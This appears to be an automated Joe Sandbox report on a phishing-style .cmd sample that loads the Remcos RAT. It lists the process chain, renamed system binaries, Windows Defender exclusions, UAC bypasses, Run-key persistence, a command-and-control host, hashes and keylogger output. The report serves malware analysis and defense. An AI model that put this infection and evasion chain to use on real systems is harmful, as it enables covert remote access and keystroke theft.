Impact: 1 Data Encrypted for Impact; 1 System Shutdown/Reboot; 1 Defacement; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1432341  Sample: Purchase Order is approved2...  Startdate: 26/04/2024  Architecture: WINDOWS  Score: 100

Node 2 (sample start)
  DNS/IP: www.pentegrasystem.com; geoplugin.net; 2 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
  Started: cmd.exe (10); Kpeyvroh.PIF (13); Kpeyvroh.PIF (15); 2 other processes (17)

Node 10 cmd.exe
  Signatures: Adds a directory exclusion to Windows Defender
  Started: sppsvc.pif (20); alpha.exe (25); extrac32.exe (27); 11 other processes (31)

Node 13 Kpeyvroh.PIF
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 4 other signatures

Node 17 (2 other processes)
  DNS/IP: 192.168.2.5 ports 138, 443, 49703 (unknown, unknown); 239.255.255.250 (unknown, Reserved)
  Started: chrome.exe (29)

Node 20 sppsvc.pif
  DNS/IP: www.pentegrasystem.com 83.137.157.85 ports 49730, 9231 (INVITECHHU, Hungary); drive.usercontent.google.com 142.250.217.193 ports 443, 49729 (GOOGLEUS, United States); geoplugin.net 178.237.33.50 ports 49731, 80 (ATOM86-ASATOM86NL, Netherlands)
  Dropped: C:\Users\Public\Libraries\Kpeyvroh (data); C:\Users\Public\Kpeyvroh.url (MS); C:\ProgramData\remcos\logs.dat (data)
  Signatures: Detected Remcos RAT; Contains functionality to change the wallpaper; Contains functionality to register a low level keyboard hook; 2 other signatures
  Started: extrac32.exe (33)

Node 25 alpha.exe
  Signatures: Adds a directory exclusion to Windows Defender
  Started: xkn.exe (37)

Node 27 extrac32.exe
  Dropped: C:\Users\Public\alpha.exe (PE32+)
  Signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Node 29 chrome.exe
  DNS/IP: www.google.com 142.250.64.196 ports 443, 49707, 49708 (GOOGLEUS, United States)

Node 31 (11 other processes)
  Started: kn.exe (39); kn.exe (41); extrac32.exe (43); 3 other processes (45)

Node 33 extrac32.exe
  Dropped: C:\Users\Public\Libraries\Kpeyvroh.PIF (PE32)

Node 37 xkn.exe
  Signatures: Powershell is started from unusual location (likely to bypass HIPS); Adds a directory exclusion to Windows Defender; Reads the Security eventlog; Reads the System eventlog
  Started: alpha.exe (47); fodhelper.exe (50)

Node 39 kn.exe
  Signatures: Registers a new ROOT certificate; Drops PE files with a suspicious file extension

Node 41 kn.exe
  Dropped: C:\Users\Public\Libraries\sppsvc.pif (PE32)

Node 43 extrac32.exe
  Dropped: C:\Users\Public\kn.exe (PE32+)

Node 45 (3 other processes)
  Dropped: C:\Users\Public\xkn.exe (PE32+); C:\Users\Public\ger.exe (PE32+)

Node 47 alpha.exe
  Signatures: Adds a directory exclusion to Windows Defender
  Started: ger.exe (52)

Node 52 ger.exe
  Signatures: UAC bypass detected (Fodhelper)

Source | Detection | Scanner | Label | Link
Purchase Order is approved26042024.cmd | 3% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
C:\Users\Public\ger.exe | 0% | ReversingLabs | |
C:\Users\Public\kn.exe | 0% | ReversingLabs | |
C:\Users\Public\xkn.exe | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
https://login.windows.local | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing |
https://contoso.com/ | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing |
http://crl.m | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0C | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
http://geoplugin.net/json.gpK0r | 0% | Avira URL Cloud | safe |
http://www.microsoft.co | 0% | Avira URL Cloud | safe |
https://%ws/%ws_%ws_%ws/service.svc/%ws | 0% | Avira URL Cloud | safe |
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpa | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpoft | 0% | Avira URL Cloud | safe |
http://geoplugin.net/user | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp2BF | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpthority | 0% | Avira URL Cloud | safe |
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop | 0% | Avira URL Cloud | safe |
^www.pentegrasystem.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown
www.google.com | 142.250.64.196 | true | false | | high
drive.google.com | 192.178.50.78 | true | false | | high
drive.usercontent.google.com | 142.250.217.193 | true | false | | high
www.pentegrasystem.com | 83.137.157.85 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop | false | Avira URL Cloud: safe | unknown
https://www.google.com/async/newtab_promos | false | | high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | false | | high
^www.pentegrasystem.com | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
https://www.google.com/async/ddljson?async=ntp:2 | false | | high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
Name | Malicious | Antivirus Detection | Reputation
  (Source listed under each entry)

https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | false | Avira URL Cloud: safe | low
  Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
https://login.microsoftonline.com/%s/oauth2/authorize | false | | high
  Source: kn.exe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
http://ocsp.sectigo.com0 | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
http://www.microsoft.co | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp
https://contoso.com/License | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
https://enterpriseregistration.windows.net/EnrollmentServer/key/ | false | | high
  Source: kn.exe
https://login.windows.local | false | URL Reputation: safe | unknown
  Source: SystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmp
http://geoplugin.net/json.gp/C | true | URL Reputation: phishing | unknown
  Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp
https://contoso.com/ | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe | false | | high
  Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp
https://oneget.orgX | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp
http://geoplugin.net/json.gpK0r | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | | high
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp
https://%ws/%ws_%ws_%ws/service.svc/%ws | false | Avira URL Cloud: safe | low
  Source: kn.exe
https://enterpriseregistration.windows.net/EnrollmentServer/device/ | false | | high
  Source: kn.exe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
http://geoplugin.net/json.gpoft | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp
http://nuget.org/NuGet.exe | false | | high
  Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp
http://geoplugin.net/json.gpa | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp
https://sectigo.com/CPS0 | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
https://login.microsoftonline.com/%s/oauth2/token | false | | high
  Source: kn.exe
http://geoplugin.net/json.gpthority | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png | true | URL Reputation: malware | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp
http://geoplugin.net/json.gp2BF | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html | false | | high
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/Icon | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp
http://geoplugin.net/user | false | Avira URL Cloud: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp
https://github.com/Pester/Pester | false | | high
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp
http://crl.m | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | false | | high
  Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | false | | high
  Source: kn.exe
https://aka.ms/pscore68 | false | | high
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp
http://www.pmail.com | false | | high
  Source: Kpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp
http://ocsp.sectigo.com0C | false | URL Reputation: safe | unknown
  Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
https://oneget.org | false | URL Reputation: safe | unknown
  Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp
https://drive.usercontent.google.com/6 | false | | high
  Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.64.196 | www.google.com | United States | | 15169 | GOOGLEUS | false
83.137.157.85 | www.pentegrasystem.com | Hungary | | 12301 | INVITECHHU | true
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
142.250.217.193 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false

Private IPs
192.168.2.5
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1432341
Start date and time: 2024-04-26 21:55:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order is approved26042024.cmd
Detection: MAL
Classification: mal100.rans.bank.troj.spyw.expl.evad.winCMD@68/35@11/6
EGA Information:
• Successful, ratio: 87.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 206
Cookbook Comments:
• Found application associated with file extension: .cmd
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.217.2.195, 108.177.12.84, 192.178.50.78, 34.104.35.123, 199.232.210.172, 192.229.211.108, 142.250.217.195, 142.250.189.142
• Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, cxcs.microsoft.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
• Execution Graph export aborted for target xkn.exe, PID 5496 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: Purchase Order is approved26042024.cmd
Time      Type             Description
21:56:02  API Interceptor  7x Sleep call for process: xkn.exe modified
21:56:16  API Interceptor  5161076x Sleep call for process: sppsvc.pif modified
21:56:26  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kpeyvroh C:\Users\Public\Kpeyvroh.url
21:56:35  API Interceptor  2x Sleep call for process: Kpeyvroh.PIF modified
21:56:35  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kpeyvroh C:\Users\Public\Kpeyvroh.url
                                                                                            • 142.250.217.193
                                                                                            https://therufus.org/download.phpGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.217.193
                                                                                            j1zkOQTx4q.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 142.250.217.193
                                                                                            VoGtelkHSn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 142.250.217.193
Columns: Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\Users\Public\alpha.exe
• Associated Sample Name / URL: Enquiry 230424.bat, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated Sample Name / URL: URGENTE_NOTIFICATION.cmd, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated Sample Name / URL: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated Sample Name / URL: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated Sample Name / URL: aaa.bat, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: 20240416-703661.cmd, Detection: malicious, Threat Name: DBatLoader
• Associated Sample Name / URL: 20240416-703661.cmd, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, RedLine
• Associated Sample Name / URL: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious, Threat Name: Remcos, DBatLoader
• Associated Sample Name / URL: FT-3-TL-BALANCE,jpg.cmd, Detection: malicious, Threat Name: DBatLoader
• Associated Sample Name / URL: ONISZCZUK ASSOCIATES Purchase Order.bat, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):288
                                                                                                                Entropy (8bit):3.3235171649784028
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:6l+YfCb5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lEDec0WFe5BWFe5BW+
                                                                                                                MD5:4C95E05ABC5B9270219FB447865EEC73
                                                                                                                SHA1:B0C4DAE10BB06B81D6F45A9B34D1B5347525E1D8
                                                                                                                SHA-256:D87FC69F8A2DFEA93FFC9CD8BB0ADE9747570228A7A5877C81FC73CFC4DE9E49
                                                                                                                SHA-512:A32240F720250C41F25A1F15721FC8220FCD2AABFCCD6B98C624CB32C79E427F7CFB3421B0E973F382BD4E3414B8A8AAA45841426C4B023A098FA09C97F9908C
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                Preview:....[.2.0.2.4./.0.4./.2.6. .2.1.:.5.6.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF">), ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):99
                                                                                                                Entropy (8bit):4.999214418208358
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiaoysb8RycuAEvn:HRYFVmTWDyzPIE9cPEvn
                                                                                                                MD5:C27D364B576ED0C0CEF5199F93E02752
                                                                                                                SHA1:2EA1DB7B11725F7D7D26BAF3878FDE8EC86B6F37
                                                                                                                SHA-256:30BADDAFDCB7A76B3C6A3420A3B5C8F69779D25F0C8B425994F1CF588368B43C
                                                                                                                SHA-512:9D02EB8093515CC6097EF40D8370F1DE3F95BCF3248986A2225E166370B97A98BD828330B0EDFA5C95A6C4EA69344B57AE1A8FED801619F87FD94696AD2988D0
                                                                                                                Malicious:true
                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF"..IconIndex=44..HotKey=8..
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):838752
                                                                                                                Entropy (8bit):7.137921219135916
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:Ry84sq+V+KFCxKsTit+UoLhZYimbsvWRtfi+EhMfHU0MlXk5:R/26+fxKjQLMFbFTEIHxMlXS
                                                                                                                MD5:C4F76AC0DA004DB0BC2CAA009C7CCDF8
                                                                                                                SHA1:A92ECFA375D947954D50F79D757A04B50F24619C
                                                                                                                SHA-256:B36E7823A1C84CB6F325038CEDD3AA46C46B93A6A85294BB121A2FF94483DDA4
                                                                                                                SHA-512:944C401BAF3BD41929BF939C54BCE964823A5A009CB49B9A4C46C30AB48E8EEF0DDA6FB18271EF7E60672E63E1D323761AD3D234FA3244EB1EC1763430E07C12
                                                                                                                Malicious:true
